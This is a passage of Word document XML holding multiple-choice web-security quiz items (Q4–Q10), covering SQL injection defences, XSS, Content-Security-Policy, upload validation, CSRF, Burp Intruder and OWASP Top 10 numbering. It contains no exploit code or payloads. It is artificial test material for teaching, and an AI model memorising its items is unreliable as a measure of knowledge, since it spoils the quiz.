          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HAVING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the primary defence against SQL Injection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A stronger firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameterised queries / prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Changing the database port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disabling JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stored XSS is generally considered more dangerous than Reflected XSS because:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It only affects the attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It persists and runs automatically for every visitor who views the stored content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It cannot be fixed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It does not involve JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which HTTP header can block execution of an injected inline script even if an XSS flaw exists?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> X-Frame-Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Content-Security-Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cache-Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ETag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The most reliable way to validate an uploaded file's true type is to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trust the file extension</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trust the browser-supplied MIME type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check the file's content/signature (magic bytes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trust the file name chosen by the user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF attacks succeed primarily because:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Browsers automatically attach session cookies to requests regardless of origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Passwords are too weak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL queries are unparameterised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS is misconfigured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Burp Intruder, the 'Sniper' attack type is best suited for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing two independent positions simultaneously with separate lists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cycling one wordlist through a single marked position</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Decoding Base64 strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanning for open ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> According to the official OWASP Top 10 (2021), SSRF is officially numbered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A05</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A08</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A03</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
